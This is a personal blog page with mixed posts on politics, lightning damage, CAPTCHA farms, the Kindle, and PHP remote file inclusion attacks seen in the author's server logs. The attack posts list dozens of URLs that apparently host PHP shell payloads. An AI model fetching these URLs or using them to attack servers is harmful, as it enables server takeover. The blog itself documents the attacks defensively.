Crazy php code injections

Posted by jerry as Hacking, Security, php, web site

 As I’ve written about here several times, the onslaught of unsuccessful php include attacks continues.  Today, I saw a new file referenced - bot.txt.  It looked like this in the apache log file:

Read the rest of this entry »

Kucinich and Paul make a good team?

Posted by jerry as Ron Paul, politics

This interview with Dennis Kucinich’s lovely & intelligent wife:

Has moderates on both sides quite excited. Unfortunately, it can’t be. There are a few major obstacles:

1. Neither appears to be on a trajectory to win their respective party primary race.
2. Someone has to be VP. It’s unlikely that, though they are close on many issues, certain ideologies like abortion, will prevent each from playing second seat to the other.
3. Either Paul or Kucinich would likely lose the support of their party should they win the primary and choose a running mate from the opposing party, rather than from the “talent pool” from their own party.

I agree, that it would be a great presidency. There would be balance and sanity in the White House, but we are teeing up for another 4 years of craziness.

Damn lightning…

Posted by jerry as lightning

I was awoke this morning by a storm coming in.  I really hate that sound in the middle of the night, because my kids are very afraid of storms.  I was counting to myself how long it would take to hear the first set of footsteps.

The rain picked up and the thunder rumbled on.  The kids did come down as I expected.  I convinced them to play in the family room and let my wife and I sleep a bit more.

It seemed like I had just fallen asleep when I heard and explosion and felt a blinding light shine through my closed eyes.  It was really close.  Probably hit a tree in my back yard.  Nothing seemed out of place, other than the ghost-white kids in my doorway.  The aquarium in my room was still working, and the bedroom light my oldest son turned on was sure as hell working.

My wife got up shortly after, and I went back to sleep.  (too many sleeping pills the night before - long story).  When I did wake up, I pulled my laptop out from under the bed, and unfortunately no Internet connection.

After a long morning of moving furniture and testing network ports, I found that I had 2 network cards die on me.  One in the new PC I had recently bought, and the other in the file server/firewall server in the basement.  I’ve spent a lot of money on lightning and surge protection for all of my equipment, including the cable modem, but apparently the EMP from the lightning induced a charge great enough to fry the two NICs.

Fortunately, I had some NICs laying around and got things running again, but that’s pretty frustrating.  I am glad that it was nothing more serious, though.

Have CAPTCHAs been broken? Sort of…

Posted by jerry as Security, web site

I just read this article about the Hannah Montana ticket debacle, and how it points to an apparent weakness is CAPTCHA.  Unfortunately, for CAPTCHA, the problem wasn’t some slick new algorithm designed by a miscreant that can reliably decipher the images, but rather establishing a network that grabs the CAPTCHA from one site, shoots it to a porn or warez we site that presents the same CAPTCHA to someone looking to score some boobies, who must answer the CAPTCHA before getting their prize.

It’s really quite clever, and I anticipate that the CAPTCHA breaking network will continue to mature, as we have seen with other malware.  Someone’s going to make a business case for hosting a service that has an input API that accepts an image, and returns the CAPTCHA text, and a similar API that presents the CAPTCHA much like an online ad, and accepts the CAPTCHA text as an input.  Sites that use the CAPTCHA and returned a “solution” are compensated in the same model as a click through for an online ad - think of it as adsense for bad people.  Except, it would be perfectly acceptable for the site owner to sit there all night and answer CAPTCHAs on his or her site, raking in the money.

On the other side, those looking to break the CAPTCHA would have to pay a small fee for a certain number of CAPTCHA credits.  The money would flow to the site owners, with the service owner keeping a service charge, of course.

 Honestly, that could spell the end for the widespread use of CAPTCHAs.  The only way to stop this is to make the CAPTCHA too difficult to read for a human, and that defeats the whole purpose.

So, in effect, CAPTCHA was broken without really breaking it.

Are domain parking companies complicit in typo-squatting?

Posted by jerry as web site

From this article 

“The domain name parking companies are providing a service. Whether or not you agree with the domain name owner’s decision to buy a certain domain name, it is not the parking company’s responsibility to police the internet and protect a company’s brand. That remains the responsibility of the brand itself. The brand or trademark owner should go after the domain owner, and not publicly lynch the domain parking companies:”

I would say that’s debatable.  Think about some “real world” parrellels:
Bootleg merchandise.  The retailer did not manfacture fake Nike shoes, he is just selling them.  It’s not his responsibility to police the goods that move through his store - that’s the responsibility of the real manufacturer.

Pirated music.  Napster, grokster, bearshare, guntella, and on and on, all claimed that they just provided a service, and there were legitimate, legal uses for the service, and that it was not their responsibility to police was was going through. 

Picture duplication.  Photo development companies claim that it’s not their responsibility to police what pictures they reproduce.  The copyright holder must do something to prevent unauthorized duplication.

In all those cases, the organization felt strongly in their footing.  But they key is that each one lost in a big way.  Like it or not, if you’re aiding in something that’s illegal, you’re complicit.  The question is where do you draw the line.  Should ISP’s have been held responsible in the music sharing cases?  Probably not.  Should the manufacturer of photo paper be held responsible for copyright infringement?  Probably not.  It’s a grey line, to be sure, but it seems pretty obvious that the domain parking companies are well on one side of the line.  The only thing missing are lawsuits and legislation now.

Conservatives Honing Gaydar?

Posted by jerry as politics

Given all of the wacky antics our conservative leadership has been, well, participating in, this, taken from Conservapedia is pretty funny:

Make no mistake, it’s clearly been “stuffed” by someone out to “bone” the repubs, but funny none-the-less.

Electotainment

Posted by jerry as news, politics

I just finished reading this article and have to respond.  The author doesn’t directly come out and say it, but is basically accusing the new media of dumbing down the political process, and we, the electorate are the victims.  We are NOT the victims… We are the cause.  Have you seen what’s on TV lately?  What are the most popular shows?  American Idol, Dancin with the Stars, reality show dejure.  The media is pavlov’s dog, and the public has been in control of the bell for a long time.  They are the monster the WE made. 

It isn’t that CNN doesn’t want to let loose Hillary’s view on Yucca Mountain!  CNN doesn’t want a million people saying “oh my god, this is boring shit.  Lets see what’s on Fox News.  Maybe there’s a police chase or a good apartment fire we can watch.”  And they’re right.  I may be interested in Hillary’s view on Yucca Mountain, the credit collapse, the slowing economy, what to do with Iran, but I represent a small minority that probably doesn’t fit into their demographic anyway. 

Up till recently, I hadn’t watched CNN or Fox News in about 2 years.  I was really bothered by what I saw when I did have a chance to watch it recently.  Every news show on CNN Headline News is presented by a “commentator”, not a reporter.  I could not believe that was Headline News.  It used to actually be 24 hours of an anchor person giving the news.  But, they’ve adapted to what the viewers want. 

 For pete’s sake, PLEASE STOP BLAMING THE MEDIA.  They’re doing what they do best - sell advertising.  They can’t sell advertising if no one watches their programming because “hard hitting journalism” can’t compete with Dancin with the Stars. 

Current crop of php include attempts

Posted by jerry as Hacking, Security, php

I’m not sure why I’m so fascinated by this crude and ineffective hacking attempt, but I am.  Here are the currently active hosts:

http://www.mta.cl/galeria2/galery2.jpg??
http://www.mta.cl/galeria2/galery.txt?
http://www.freewebtown.com/w8ting/safe.txt??
http://tools.aerofito.com/safeon.txt??
http://64.203.191.222/.check/c.txt?
http://www.ohanlonpaving.com/phpmic.txt.txt?
http://rotation.wooshck.org/image/safe.txt?
http://83.19.144.26/bo.do??
http://www.old2sold.net/newpitbulonspread.txt?
http://coolpc.com.tw/evaluate/safe?
http://www.ena-gmbh.de/download/cikos.txt?
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://www.freewebtown.com/komandan/tool/q3.txt?
http://www.manycontentz.com//ine/img/contr.txt??
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://electro.lydo.org/rfi/id.txt?
http://freewebs.com/chika_manis_banget/cmd.txt???
http://www.martinschaab.de/php/id.txt?
http://www.realtyna.com/about.gif??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.realtyna.com/safe.txt??
http://www.cluelesstravel.com/guestheath/id.txt??
http://bondick.net/flashchat/nick_image/htaccess?
http://kiopmanminsuion.chat.ru/http?
http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.martinschaab.de/php/phpSecurePages//phpSecurePages/u.txt?

kindle hype

Posted by jerry as kindle

I’ve been bombarded with kindle news everywhere I go today.  “It’s going to revolutionize the e-reading market”.  Really?  How big is the e-reading market?  Amazon seems to have really made the device as integrated and friendly as possible, but the reality is that you’re still stuck reading on a small screen.  I don’t like reading emails on my blackberry.  I hate web surfing on it, but I will in a pinch.  I cannot see myself “curling up” with a PDA-sized device to read a book.  It’s just not going to happen.  The really goes back to the days of the palm pilot.  I remember downloading ebooks to it, thinking to myself how cool it will be to have all these books with me wherever I go.  But, I never read one of them.  It was just not comfortable.  I have a hard time reading a book on a 19″ LCD monitor. 

The price is pretty steep as well.  Buying the box for $399, then needing to spend $10 to $20 per book just doesn’t seem likely.  I like gadgets as much as the next guy, but I do not see myself spending money on this.  In fact, I’ve been in a mode of device contraction.  I had a phone, a pocket PC, and an ipod.  Now, I’m down to a blackberry and a ipod, and if I could get rid of the ipod, I would.

Having said all of that, the EVDO access to content is pretty slick.

PHP include attacks rolling on…

Posted by jerry as Hacking, Security, php, search engine, web site

I’ve written about this a bit, and I’ve started a current attack list on networkstike.com, but the intensity seems to be increasing in these attempts.  I decide to google one of the URL’s that’s included, and right off the bat, I found this article from a web site that’s seeing the same thing.  I believe these attacks are being launched from a botnet, trolling for vulnerable sites to use for some kind of illicit business.

What was really interesting to me in my google search for some of the inclusion URLs is the number of log files that are available and indexed via google.  For a long time, I have gotten many hits with the referral set to a spammy site - an obvious attempt to get some clicks and link mojo with Google.   I never really thought a lot about it, but I can see that it’s probably a fairly effective thing, given the number of log files I found via google.

The current list of php inclusion hits for my sites is below:

http://www.s1ko.jazztel.es/safe.gif?
http://gw-gold.net/dragoc/id.txt?
http://musicgirll.chat.ru/wav/mysong?
http://www.mta.cl/galeria2/galery.txt?
http://www.mta.cl/galeria2/galery.jpg?
http://www.madinaedu.gov.sa/safeon.txt??
http://www.modelismo.alternativo.nom.br//poll/polldata/readme.txt??
http://shellbr.com.sapo.pt/safeon.txt??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.volontaridelrotary2040.com/html/modules/xt_conteudo/NewFile.txt?
http://telkomsex.com/ec.txt?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://neu.sv-badbentheim.de/hide.txt?
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages2.gif???
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages.gif???
http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif??
http://www.hgbruce.com/components/com_rsgallery/safeon.txt??
http://tr-igus.com/safe.txt?
http://www.valerieataylor.com/gb/book2.gif??
http://servergazi.com/portal/images/stories/web.gif??
http://hackbsd.net/.xrt/safe.gif?
http://www.freewebtown.com/w8ting/safe.txt??
http://rumusic.chat.ru/rumusic.wav?
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://www.martinschaab.de/php/id.txt?
http://x0.741.com/pb.txt?
http://location-investment.com/Connections/r8.txt?
http://jjisdfiuw834wsdd.chat.ru/js?

I’ve started downloading the files and looking at them.  Many of them are loosly copied off of one another, some are exactly the same.  Some are quite complex, all-in-one shells, that would allow complete server control.  Most of them appear to give some basic information, like directory, available disk space, effetive UID and GID, and the like.